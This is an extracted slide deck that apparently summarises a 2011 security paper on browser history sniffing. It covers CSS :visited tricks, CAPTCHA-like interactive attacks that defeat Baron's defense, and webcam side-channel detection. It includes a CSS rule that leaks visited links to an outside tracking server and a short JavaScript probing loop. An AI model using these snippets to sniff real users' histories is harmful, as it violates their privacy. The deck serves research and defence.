![Page 1: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/1.jpg)
Zachary WeinbergEric Y. Chen
Pavithra Ramesh JayaramanCollin Jackson
Carnegie Mellon University
I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
IEEE Symposium on Security and Privacy, May 2011
![Page 2: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/2.jpg)
2
![Page 3: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/3.jpg)
3
Outline
IntroductionAutomated AttacksExp 1: Interactive AttacksExp 2: Side-Channel AttacksRelated WorkConclusion
![Page 4: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/4.jpg)
4
Introduction
History Sniffing through CSS :visited Andrew Clover, 2002,
http://seclists.org/bugtraq/2002/Feb/271in HTML<a id="link1" href="http://google.com/">Visit Google!</a>
in CSS#link1:visited {
color: red;background: url(http://140.115.53.28/track.php?url=google.com);
}
![Page 5: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/5.jpg)
5
Introduction
L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy make getComputedStyle act as though all links are
unvisited make certain CSS selectors act as though links are
always unvisited limits the CSS properties that can be used to style
visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense still vulnerable with interactive attacks
![Page 6: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/6.jpg)
6
Introduction
Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications Small sets of links (6~220) probed by real exploiters
46 popular websites, including one from Alexa Top100This makes interactive attacks possible
![Page 7: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/7.jpg)
7
Introduction
What can history sniffers do? Benign:
Websites could use history sniffing to determine whether their users have visited known phishing sites.
Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. Cookies
Malicious: Track visitors across sites for advertising purpose,
determining whether they also visit a site’s competitors. Attackers can construct more targeted phishing pages, by
impersonating only sites that a particular victim is known to visit
![Page 8: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/8.jpg)
8
Automated Attacks
Direct sniffing
<style> a:visited { color: red; } </style>
var url_array = new Array('http://a.com', 'http://b.com');var visited_array = new Array(); var link_el = document.createElement('a');var computed_style = document.defaultView.getComputedStyle(link_el,
""); for (var i = 0; i < url_array.length; i++) {
link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); }
}
![Page 9: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/9.jpg)
9
Automated Attacks
Indirect Sniffing Make visited and unvisited links take different
amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
Make visited and unvisited links cause different images to load. background-image style used in :visited rule Not requires JavaScript
![Page 10: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/10.jpg)
10
Automated Attacks
Side-channel sniffing Timing attacks
the attacker can make the page take longer to lay out if a link is visited than if it is unvisited Transparent Underline Any other style rules in :visited
Defense Baron’s solution does well for all 3 types
(direct/indirect/side-channel) above
![Page 11: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/11.jpg)
11
Exp 1: Interactive Attacks
Require victims to interact with malicious sites The authors claim that interactive attacks can be disguised
as “normal” interactive tasks that users will not find surprising or suspicious
Amazon’s Mechanical Turk Recruit 307 participants
All tasks in this experiment operate within the constraints of Baron’s defense Visited-link styles only change the color on the screen Pretend to be CAPTCHA tests CAPTCHA: Completely Automated Public Turing test to
tell Computers and Humans Apart
![Page 12: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/12.jpg)
12
Exp 1: Interactive Attacks
1. Word CAPTCHA
Each word is a hyperlink to an URL that the attacker wishes to probe
If unvisited, it is drawn in the same color as the background.
![Page 13: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/13.jpg)
13
Exp 1: Interactive Attacks
2. Character CAPTCHA
Seven-segment LCD symbols Every letter represents 3 URLs Site-supplied font
![Page 14: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/14.jpg)
14
Exp 1: Interactive Attacks
4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 “ – “ is always-on
![Page 15: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/15.jpg)
15
Exp 1: Interactive Attacks
3. Chessboard puzzle Each square contains a URL Only the pawns corresponding to visited sites are made visible Using SVG or text to control the pawns
![Page 16: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/16.jpg)
16
Exp 1: Interactive Attacks
4. Pattern matching puzzle
![Page 17: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/17.jpg)
17
Exp 1: Interactive Attacks
Randomly generated task instances corresponding to known proportions of visited and unvisited links.
![Page 18: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/18.jpg)
18
Exp 1: Interactive Attacks
Automated history-sniffing exploits on all the participants URL set from wtikay.com
7012 commonly visited URLs (from Alexa Top 5000)
![Page 19: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/19.jpg)
19
Exp 1: Interactive Attacks
![Page 20: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/20.jpg)
20
Exp 1: Interactive Attacks
![Page 21: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/21.jpg)
21
Exp 1: Interactive Attacks
![Page 22: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/22.jpg)
22
Exp 1: Interactive Attacks
![Page 23: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/23.jpg)
23
Exp 1: Interactive Attacks
![Page 24: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/24.jpg)
24
Exp 2: Side-channel Attacks
Webcam attacks <blink> Random 20 URLs with 10 visited ones Variant 1:
Designed to comply with the WCAG standard for seizure safety
Variant 2: Make entire browser window flash Brighter color
![Page 25: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/25.jpg)
25
Exp 2: Side-channel Attacks
Author test 100% accuracy for both variants in all condition
Will-lit room Person stays still in front of the computer In a dark room, accuracy dropped to 50%
Field test 60 / 307 participants
![Page 26: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/26.jpg)
26
Exp 2: Side-channel Attacks
Field test
![Page 27: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/27.jpg)
27
Exp 2: Side-channel Attacks
In real life, ChatRoulette service
The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor
![Page 28: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/28.jpg)
28
Related Work
Page cache Felten et al., Timing Attacks on Web Privacy
DNS cache Felten et al., Timing Attacks on Web Privacy
Both tactics above Only for the first time Short-term history
Loadable cross-origin but only available to logged-in users Facebook, Gmail, Twitter, etc. JavaScript onerror event
![Page 29: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/29.jpg)
29
Related Work
Cookie, Flash Player local shared objectsAd-blocker, Private browsing mode
![Page 30: I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history](https://reader036.vdocument.in/reader036/viewer/2022070500/5681685f550346895ddea5af/html5/thumbnails/30.jpg)
30
Conclusion
Automated history sniffing attacks have successfully been blocked by Baron’s solution
Interactive attacks are notThis paper developed POC of 6 history
sniffing exploited against Baron’s defense 4 interactive attacks 2 detection of the screen through webcam